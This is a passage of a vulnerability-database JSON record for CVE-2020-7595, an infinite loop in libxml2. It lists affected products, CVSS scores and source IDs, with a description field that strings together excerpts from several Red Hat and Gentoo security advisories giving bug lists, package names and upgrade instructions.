e9kVjDMJrHdYR5iXXc665LOYBG0yyDGdvVLeqxjI9S11UDypRyzy641kwBY6eCru
0yaA88aZ4YpQyIARmmK7cIMFe6JRWHOkEsOfMCtjpbkGLteXdzfUFgJnlRFB0Dai
OVrZH3kGb5EbKvJGcWY7cqv5jQhpy802a4EhpHQ1q6vFAbO7D1T6vJlCyP0+ba5N
ZoMyrCFWaX5TUjiwFkuyAiSZYyPyxo0+dhqgJaSU44BH4p5imV7c1oh10U7/7k+O
Y30M2uLOuArD1ad0t2d23EVr8mRKUr+agoLWC8Pwuq2worTArE/395GKXv2Yvtv9
YCvvCNFIcnG5GaJloqhXkTZM2pCr0+n90WLrNZ0suPArycHU74ROfBNErWegvq2e
gpFLyu3S1mpjcBG19Gjg1qgh7FKg57s7PbNzcETK5ParBQeZ4dHHpcr9voP52tYD
SJ9ILV9unM5jya5Uwooa6GOFGistLQLntZd22zDcPahu0FxvQlyZFV4oInF0m/7h
e/h8NgSwyJKNenZATlsOGmjdcMh95Unztu4bfK8S20/Ej8F/B2PE4Kxha2s0bxsC
b9fFKBOIdTCeFi2lTyrctEGQl9ksrW/Va6+uQwe5lKQldwhB3of9QolUu7ud+gdx
COt/fBH012Y=
=udpL
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce

Solution:
See the documentation at: https://access.redhat.com/documentation/en-us/openshift_container_platform/4.6/html/serverless_applications/index
- Bugs fixed (https://bugzilla.redhat.com/):
1874857 - CVE-2020-24553 golang: default Content-Type setting in net/http/cgi and net/http/fcgi could cause XSS 1897635 - CVE-2020-28362 golang: math/big: panic during recursive division of very large numbers 1897643 - CVE-2020-28366 golang: malicious symbol names can lead to code execution at build time 1897646 - CVE-2020-28367 golang: improper validation of cgo flags can lead to code execution at build time 1906381 - Release of OpenShift Serverless Serving 1.12.0 1906382 - Release of OpenShift Serverless Eventing 1.12.0
{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "18.04"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "31"
},
{
"_id": null,
"model": "libxml2",
"scope": "eq",
"trust": 1.0,
"vendor": "xmlsoft",
"version": "2.9.10"
},
{
"_id": null,
"model": "enterprise manager ops center",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.4.0.0"
},
{
"_id": null,
"model": "real user experience insight",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.3.1.0"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "19.10"
},
{
"_id": null,
"model": "mysql workbench",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.26"
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "14.04"
},
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.58"
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "sinema remote connect server",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "3.0"
},
{
"_id": null,
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.4.0.0"
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "real user experience insight",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.5.1.0"
},
{
"_id": null,
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.5.0.0"
},
{
"_id": null,
"model": "symantec netbackup",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "steelstore cloud integrated storage",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "30"
},
{
"_id": null,
"model": "snapdrive",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "16.04"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "32"
},
{
"_id": null,
"model": "smi-s provider",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "real user experience insight",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.4.1.0"
},
{
"_id": null,
"model": "clustered data ontap",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications cloud native core network function cloud native environment",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.10.0"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "12.04"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-7595"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "162694"
},
{
"db": "PACKETSTORM",
"id": "162142"
},
{
"db": "PACKETSTORM",
"id": "161016"
},
{
"db": "PACKETSTORM",
"id": "162130"
},
{
"db": "PACKETSTORM",
"id": "159553"
},
{
"db": "PACKETSTORM",
"id": "161916"
},
{
"db": "PACKETSTORM",
"id": "159851"
},
{
"db": "PACKETSTORM",
"id": "159349"
},
{
"db": "PACKETSTORM",
"id": "160961"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-965"
}
],
"trust": 1.5
},
"cve": "CVE-2020-7595",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2020-7595",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-185720",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2020-7595",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-7595",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2020-7595",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202001-965",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-185720",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2020-7595",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-185720"
},
{
"db": "VULMON",
"id": "CVE-2020-7595"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-965"
},
{
"db": "NVD",
"id": "CVE-2020-7595"
},
{
"db": "NVD",
"id": "CVE-2020-7595"
}
]
},
"description": {
"_id": null,
"data": "xmlStringLenDecodeEntities in parser.c in libxml2 2.9.10 has an infinite loop in a certain end-of-file situation. It exists that libxml2 incorrectly handled certain XML files. \n(CVE-2019-19956, CVE-2020-7595). Bugs fixed (https://bugzilla.redhat.com/):\n\n1914774 - CVE-2021-20178 ansible: user data leak in snmp_facts module\n1915808 - CVE-2021-20180 ansible module: bitbucket_pipeline_variable exposes secured values\n1916813 - CVE-2021-20191 ansible: multiple modules expose secured values\n1925002 - CVE-2021-20228 ansible: basic.py no_log with fallback option\n1939349 - CVE-2021-3447 ansible: multiple modules expose secured values\n\n5. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 202010-04\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: libxml2: Multiple vulnerabilities\n Date: October 20, 2020\n Bugs: #710748\n ID: 202010-04\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in libxml2, the worst of which\ncould result in a Denial of Service condition. \n\nBackground\n==========\n\nlibxml2 is the XML (eXtended Markup Language) C parser and toolkit\ninitially developed for the Gnome project. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 dev-libs/libxml2 \u003c 2.9.10 \u003e= 2.9.10\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in libxml2. Please review\nthe CVE identifiers referenced below for details. \n\nImpact\n======\n\nPlease review the referenced CVE identifiers for details. 
\n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll libxml2 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-libs/libxml2-2.9.10\"\n\nReferences\n==========\n\n[ 1 ] CVE-2019-20388\n https://nvd.nist.gov/vuln/detail/CVE-2019-20388\n[ 2 ] CVE-2020-7595\n https://nvd.nist.gov/vuln/detail/CVE-2020-7595\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/202010-04\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2020 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5\n\n. \nThe compliance-operator image updates are now available for OpenShift\nContainer Platform 4.6. 
\n\nBug Fix(es):\n\n* Aggregator pod tries to parse ConfigMaps without results (BZ#1899479)\n\n* The compliancesuite object returns error with ocp4-cis tailored profile\n(BZ#1902251)\n\n* The compliancesuite does not trigger when there are multiple rhcos4\nprofiles added in scansettingbinding object (BZ#1902634)\n\n* [OCP v46] Not all remediations get applied through machineConfig although\nthe status of all rules shows Applied in ComplianceRemediations object\n(BZ#1907414)\n\n* The profile parser pod deployment and associated profiles should get\nremoved after upgrade the compliance operator (BZ#1908991)\n\n* Applying the \"rhcos4-moderate\" compliance profile leads to Ignition error\n\"something else exists at that path\" (BZ#1909081)\n\n* [OCP v46] Always update the default profilebundles on Compliance operator\nstartup (BZ#1909122)\n\n3. Solution:\n\nFor OpenShift Container Platform 4.6 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-rel\nease-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.6/updating/updating-cluster\n- -cli.html. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n1899479 - Aggregator pod tries to parse ConfigMaps without results\n1902111 - CVE-2020-27813 golang-github-gorilla-websocket: integer overflow leads to denial of service\n1902251 - The compliancesuite object returns error with ocp4-cis tailored profile\n1902634 - The compliancesuite does not trigger when there are multiple rhcos4 profiles added in scansettingbinding object\n1907414 - [OCP v46] Not all remediations get applied through machineConfig although the status of all rules shows Applied in ComplianceRemediations object\n1908991 - The profile parser pod deployment and associated profiles should get removed after upgrade the compliance operator\n1909081 - Applying the \"rhcos4-moderate\" compliance profile leads to Ignition error \"something else exists at that path\"\n1909122 - [OCP v46] Always update the default profilebundles on Compliance operator startup\n\n5. Description:\n\nRed Hat 3scale API Management delivers centralized API management features\nthrough a distributed, cloud-hosted layer. It includes built-in features to\nhelp in building a more successful API program, including access control,\nrate limits, payment gateway integration, and developer experience tools. \n\nThis advisory is intended to use with container images for Red Hat 3scale\nAPI Management 2.10.0. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):\n\n1804533 - CVE-2020-9283 golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic\n1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash\n\n5. Solution:\n\nFor information on upgrading Ansible Tower, reference the Ansible Tower\nUpgrade and Migration Guide:\nhttps://docs.ansible.com/ansible-tower/latest/html/upgrade-migration-guide/\nindex.html\n\n4. 
Description:\n\nRed Hat OpenShift Do (odo) is a simple CLI tool for developers to create,\nbuild, and deploy applications on OpenShift. The odo tool is completely\nclient-based and requires no server within the OpenShift cluster for\ndeployment. It detects changes to local code and deploys it to the cluster\nautomatically, giving instant feedback to validate changes in real-time. It\nsupports multiple programming languages and frameworks. \n\nThe advisory addresses the following issues:\n\n* Re-release of odo-init-image 1.1.3 for security updates\n\n3. Solution:\n\nDownload and install a new CLI binary by following the instructions linked\nfrom the References section. Bugs fixed (https://bugzilla.redhat.com/):\n\n1832983 - Release of 1.1.3 odo-init-image\n\n5. 8) - aarch64, ppc64le, s390x, x86_64\n\n3. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Moderate: libxml2 security and bug fix update\nAdvisory ID: RHSA-2020:3996-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2020:3996\nIssue date: 2020-09-29\nCVE Names: CVE-2019-19956 CVE-2019-20388 CVE-2020-7595\n====================================================================\n1. Summary:\n\nAn update for libxml2 is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 
7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nThe libxml2 library is a development toolbox providing the implementation\nof various XML standards. \n\nSecurity Fix(es):\n\n* libxml2: memory leak in xmlParseBalancedChunkMemoryRecover in parser.c\n(CVE-2019-19956)\n\n* libxml2: memory leak in xmlSchemaPreRun in xmlschemas.c (CVE-2019-20388)\n\n* libxml2: infinite loop in xmlStringLenDecodeEntities in some end-of-file\nsituations (CVE-2020-7595)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.9 Release Notes linked from the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe desktop must be restarted (log out, then log back in) for this update\nto take effect. \n\n5. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nlibxml2-2.9.1-6.el7.5.src.rpm\n\nx86_64:\nlibxml2-2.9.1-6.el7.5.i686.rpm\nlibxml2-2.9.1-6.el7.5.x86_64.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.x86_64.rpm\nlibxml2-python-2.9.1-6.el7.5.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nlibxml2-debuginfo-2.9.1-6.el7.5.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.x86_64.rpm\nlibxml2-devel-2.9.1-6.el7.5.i686.rpm\nlibxml2-devel-2.9.1-6.el7.5.x86_64.rpm\nlibxml2-static-2.9.1-6.el7.5.i686.rpm\nlibxml2-static-2.9.1-6.el7.5.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 
7):\n\nSource:\nlibxml2-2.9.1-6.el7.5.src.rpm\n\nx86_64:\nlibxml2-2.9.1-6.el7.5.i686.rpm\nlibxml2-2.9.1-6.el7.5.x86_64.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.x86_64.rpm\nlibxml2-python-2.9.1-6.el7.5.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nlibxml2-debuginfo-2.9.1-6.el7.5.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.x86_64.rpm\nlibxml2-devel-2.9.1-6.el7.5.i686.rpm\nlibxml2-devel-2.9.1-6.el7.5.x86_64.rpm\nlibxml2-static-2.9.1-6.el7.5.i686.rpm\nlibxml2-static-2.9.1-6.el7.5.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nlibxml2-2.9.1-6.el7.5.src.rpm\n\nppc64:\nlibxml2-2.9.1-6.el7.5.ppc.rpm\nlibxml2-2.9.1-6.el7.5.ppc64.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.ppc.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.ppc64.rpm\nlibxml2-devel-2.9.1-6.el7.5.ppc.rpm\nlibxml2-devel-2.9.1-6.el7.5.ppc64.rpm\nlibxml2-python-2.9.1-6.el7.5.ppc64.rpm\n\nppc64le:\nlibxml2-2.9.1-6.el7.5.ppc64le.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.ppc64le.rpm\nlibxml2-devel-2.9.1-6.el7.5.ppc64le.rpm\nlibxml2-python-2.9.1-6.el7.5.ppc64le.rpm\n\ns390x:\nlibxml2-2.9.1-6.el7.5.s390.rpm\nlibxml2-2.9.1-6.el7.5.s390x.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.s390.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.s390x.rpm\nlibxml2-devel-2.9.1-6.el7.5.s390.rpm\nlibxml2-devel-2.9.1-6.el7.5.s390x.rpm\nlibxml2-python-2.9.1-6.el7.5.s390x.rpm\n\nx86_64:\nlibxml2-2.9.1-6.el7.5.i686.rpm\nlibxml2-2.9.1-6.el7.5.x86_64.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.x86_64.rpm\nlibxml2-devel-2.9.1-6.el7.5.i686.rpm\nlibxml2-devel-2.9.1-6.el7.5.x86_64.rpm\nlibxml2-python-2.9.1-6.el7.5.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 
7):\n\nppc64:\nlibxml2-debuginfo-2.9.1-6.el7.5.ppc.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.ppc64.rpm\nlibxml2-static-2.9.1-6.el7.5.ppc.rpm\nlibxml2-static-2.9.1-6.el7.5.ppc64.rpm\n\nppc64le:\nlibxml2-debuginfo-2.9.1-6.el7.5.ppc64le.rpm\nlibxml2-static-2.9.1-6.el7.5.ppc64le.rpm\n\ns390x:\nlibxml2-debuginfo-2.9.1-6.el7.5.s390.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.s390x.rpm\nlibxml2-static-2.9.1-6.el7.5.s390.rpm\nlibxml2-static-2.9.1-6.el7.5.s390x.rpm\n\nx86_64:\nlibxml2-debuginfo-2.9.1-6.el7.5.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.x86_64.rpm\nlibxml2-static-2.9.1-6.el7.5.i686.rpm\nlibxml2-static-2.9.1-6.el7.5.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nlibxml2-2.9.1-6.el7.5.src.rpm\n\nx86_64:\nlibxml2-2.9.1-6.el7.5.i686.rpm\nlibxml2-2.9.1-6.el7.5.x86_64.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.x86_64.rpm\nlibxml2-devel-2.9.1-6.el7.5.i686.rpm\nlibxml2-devel-2.9.1-6.el7.5.x86_64.rpm\nlibxml2-python-2.9.1-6.el7.5.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nlibxml2-debuginfo-2.9.1-6.el7.5.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.x86_64.rpm\nlibxml2-static-2.9.1-6.el7.5.i686.rpm\nlibxml2-static-2.9.1-6.el7.5.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2019-19956\nhttps://access.redhat.com/security/cve/CVE-2019-20388\nhttps://access.redhat.com/security/cve/CVE-2020-7595\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.9_release_notes/index\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2020 Red Hat, Inc. 
\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBX3OgG9zjgjWX9erEAQg9vhAAiDkPkj6VlpMKDvgVUY4eU83p4bCnZqos\ne9kVjDMJrHdYR5iXXc665LOYBG0yyDGdvVLeqxjI9S11UDypRyzy641kwBY6eCru\n0yaA88aZ4YpQyIARmmK7cIMFe6JRWHOkEsOfMCtjpbkGLteXdzfUFgJnlRFB0Dai\nOVrZH3kGb5EbKvJGcWY7cqv5jQhpy802a4EhpHQ1q6vFAbO7D1T6vJlCyP0+ba5N\nZoMyrCFWaX5TUjiwFkuyAiSZYyPyxo0+dhqgJaSU44BH4p5imV7c1oh10U7/7k+O\nY30M2uLOuArD1ad0t2d23EVr8mRKUr+agoLWC8Pwuq2worTArE/395GKXv2Yvtv9\nYCvvCNFIcnG5GaJloqhXkTZM2pCr0+n90WLrNZ0suPArycHU74ROfBNErWegvq2e\ngpFLyu3S1mpjcBG19Gjg1qgh7FKg57s7PbNzcETK5ParBQeZ4dHHpcr9voP52tYD\nSJ9ILV9unM5jya5Uwooa6GOFGistLQLntZd22zDcPahu0FxvQlyZFV4oInF0m/7h\ne/h8NgSwyJKNenZATlsOGmjdcMh95Unztu4bfK8S20/Ej8F/B2PE4Kxha2s0bxsC\nb9fFKBOIdTCeFi2lTyrctEGQl9ksrW/Va6+uQwe5lKQldwhB3of9QolUu7ud+gdx\nCOt/fBH012Y=udpL\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. Solution:\n\nSee the documentation at:\nhttps://access.redhat.com/documentation/en-us/openshift_container_platform/\n4.6/html/serverless_applications/index\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1874857 - CVE-2020-24553 golang: default Content-Type setting in net/http/cgi and net/http/fcgi could cause XSS\n1897635 - CVE-2020-28362 golang: math/big: panic during recursive division of very large numbers\n1897643 - CVE-2020-28366 golang: malicious symbol names can lead to code execution at build time\n1897646 - CVE-2020-28367 golang: improper validation of cgo flags can lead to code execution at build time\n1906381 - Release of OpenShift Serverless Serving 1.12.0\n1906382 - Release of OpenShift Serverless Eventing 1.12.0\n\n5",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-7595"
},
{
"db": "VULHUB",
"id": "VHN-185720"
},
{
"db": "VULMON",
"id": "CVE-2020-7595"
},
{
"db": "PACKETSTORM",
"id": "162694"
},
{
"db": "PACKETSTORM",
"id": "162142"
},
{
"db": "PACKETSTORM",
"id": "159639"
},
{
"db": "PACKETSTORM",
"id": "161016"
},
{
"db": "PACKETSTORM",
"id": "162130"
},
{
"db": "PACKETSTORM",
"id": "159553"
},
{
"db": "PACKETSTORM",
"id": "161916"
},
{
"db": "PACKETSTORM",
"id": "159851"
},
{
"db": "PACKETSTORM",
"id": "159349"
},
{
"db": "PACKETSTORM",
"id": "160961"
}
],
"trust": 1.98
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2020-7595",
"trust": 2.8
},
{
"db": "SIEMENS",
"id": "SSA-292794",
"trust": 1.8
},
{
"db": "ICS CERT",
"id": "ICSA-21-103-08",
"trust": 1.8
},
{
"db": "PACKETSTORM",
"id": "159851",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "159349",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "161916",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "162694",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "159639",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202001-965",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2021.0584",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.3732",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1207",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3535",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2604",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1744",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.0902",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.4513",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1242",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1727",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3364",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1564",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2162",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1826",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.0234",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3631",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.0864",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.0471",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.0845",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3868",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.0986",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3550",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.0691",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3248",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.4100",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3102",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.0319",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1193",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.0171",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3072",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.0099",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1638",
"trust": 0.6
},
